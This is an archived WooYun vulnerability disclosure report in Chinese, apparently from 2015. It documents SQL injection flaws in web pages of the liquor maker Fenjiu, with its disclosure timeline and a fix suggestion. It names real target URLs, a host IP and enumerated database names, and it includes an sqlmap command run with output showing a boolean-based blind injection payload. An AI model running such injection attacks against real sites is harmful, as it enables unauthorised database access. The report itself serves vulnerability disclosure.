乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-05: 细节已通知厂商并且等待厂商处理中 2015-07-09: 厂商已经确认,细节仅向厂商公开 2015-07-19: 细节向核心白帽子及相关领域专家公开 2015-07-29: 细节向普通白帽子公开 2015-08-08: 细节向实习白帽子公开 2015-08-23: 细节向公众公开
中国十大名酒,是指茅台、五粮液、洋河大曲、泸州老窖、汾酒、郎酒、古井贡酒、西凤酒、贵州董酒、剑南春等十大白酒品牌。中国名酒为国家评定的质量最高的酒。国内曾先后五次进行白酒国际级评比,茅台酒、五粮液等酒在历次国家评酒会上都被评为名酒。
http://wl.fenjiu.com.cn/fenjiu/all/cuxiao/out_print.jsp?checkid=104837Target: http://wl.fenjiu.com.cn/fenjiu/all/cuxiao/out_print.jsp?checkid=104837Host IP: 59.48.246.10Web Server: *****************Powered-by: *********************************************************************************DB Server: MySQL >=5Current DB: fenjiu1Data Bases: information_schema fenjiu fenjiu1 fenjiu2
http://www.fenjiu.com.cn/admin/count/index.asphttp://oa.fenjiu.com.cn/page/maint/template/news/newstemplateprotal.jsp?templatetype=1&templateid=81&docid=119443
http://oa.fenjiu.com.cn/page/maint/template/news/newstemplateprotal.jsp?templatetype=1&templateid=81&docid=119443F:\Python27\sqlmap>sqlmap.py -u "http://oa.fenjiu.com.cn/page/maint/template/news/newstemplateprotal.jsp?templatetype=1&templateid=81&docid=119443" _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150529}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 01:04:29[01:04:29] [INFO] resuming back-end DBMS 'oracle'[01:04:29] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: templateid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: templatetype=1&templateid=81 AND 9967=9967&docid=119443---[01:04:38] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[01:04:38] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\oa.fenjiu.com.cn'[*] shutting down at 01:04:38
1:过滤' select等字符
危害等级:中
漏洞Rank:8
确认时间:2015-07-09 17:19
CNVD确认所述漏洞情况,暂未建立与软件生产厂商或网站管理单位的直接处置渠道,待认领。
暂无